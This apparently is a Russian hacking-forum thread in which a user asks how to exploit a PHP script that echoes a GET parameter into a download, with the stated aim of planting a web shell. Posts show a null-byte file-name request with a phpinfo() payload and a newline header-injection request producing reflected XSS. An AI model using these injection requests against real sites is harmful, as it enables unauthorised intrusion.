echo в php

Discussion in 'Песочница' started by jangle, 14 Dec 2011.

  1. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    можно ли как то использовать как уязвимость код в php
    PHP:
    <? echo($_GET["output"]); ?>
    Спасибо заранее
     
  2. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    PHP:
    <?
    include_once( 
    "include.php" );
      
      if( isset( 
    $_GET["output"] ))
        
    $output urldecode$_GET["output"] );
      else 
    $output "";
      
      if( isset( 
    $_GET["title"] ))
        
    $title $_GET["title"];
      else 
    $title "";
      
      
    $len strlen$output );
      
    $todaysdate date("d-M-Y");
        
        
    header("Cache-control: private");
        
    header("Content-Disposition: attachment; filename=".$title."Report".$todaysdate.".xls");
        
    header("Content-Type: application/octet-outputeam");
        
    header("Content-Length: $len");
        
        
    header("Connection: close");
        
    header("Expires: 0");
        echo(
    $output);
    ?>
    А вообще интересует следующий кусок кода. При запросе
    PHP:
    http://site.com/file.php?title=123.php%00&output=<? phpinfo(); ?>
    скачиваю файл 123.php c содержимым
    PHP:
    <? phpinfo(); ?>
    Как то можно это использовать. Конечная цель - веб шелл.
     
  3. vernite akk=

    vernite akk= New Member

    Joined:
    18 May 2011
    Messages:
    73
    Likes Received:
    2
    Reputations:
    0
    Врятли это както можно использовать только если xss там проскочит, а так скорее всего прав на выполнение нет..
     
  4. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    а при чем тут права? можно поподробнее? надо заставить по сути файл выполнятся вместо того что бы он скачивался.
     
  5. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    В этом куске кода никакой баги нет.
     
  6. |qbz|

    |qbz| Banned

    Joined:
    25 Dec 2009
    Messages:
    385
    Likes Received:
    169
    Reputations:
    65
    XSS же пассивка.
     
  7. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Для того, чтобы получить XSS, нужно сорвать процесс "скачки", а для этого необходимо сорвать header(), к примеру, параметр в header не поддерживает не однострочные текста.
    Code:
    ?output=%3Cscript%3Ealert%281%29%3C/script%3E&title=%0A
    
    Получаем:
    Code:
    <br />
    <b>Warning</b>:  Header may not contain more than a single header, new line detected. in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>16</b><br />
    <br />
    <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>17</b><br />
    <br />
    
    <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>18</b><br />
    <br />
    <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>20</b><br />
    <br />
    <b>Warning</b>:  Cannot modify header information - headers already sent by (output started at Q:\xampp\xampp\files\echo.php:16) in <b>Q:\xampp\xampp\files\echo.php</b> on line <b>21</b><br />
    
    <script>alert(1)</script>
    
     
  8. Rebz

    Rebz Super Moderator
    Staff Member

    Joined:
    8 Nov 2004
    Messages:
    4,055
    Likes Received:
    1,532
    Reputations:
    1,128
  9. jangle

    jangle Member

    Joined:
    19 Nov 2006
    Messages:
    117
    Likes Received:
    5
    Reputations:
    6
    Уважаемый Rebz
    Могу ли я попросить привести пример непосредственно к коду который я выложил выше. Я долгое время пытался разобраться сам, но мой англ желает лучшего.
    В итоге мы получим XSS или все таки можно будет использовать PHP?
    Заранее благодарен

    А за ссылку огромнейшее спасибо. Больше обрадовался что есть чему то научиться, чем возможности эксплуатации уязвимости.

    И личный вопрос, если можно, ты входишь в команду ONSEC?
     
    #9 jangle, 20 Dec 2011
    Last edited: 20 Dec 2011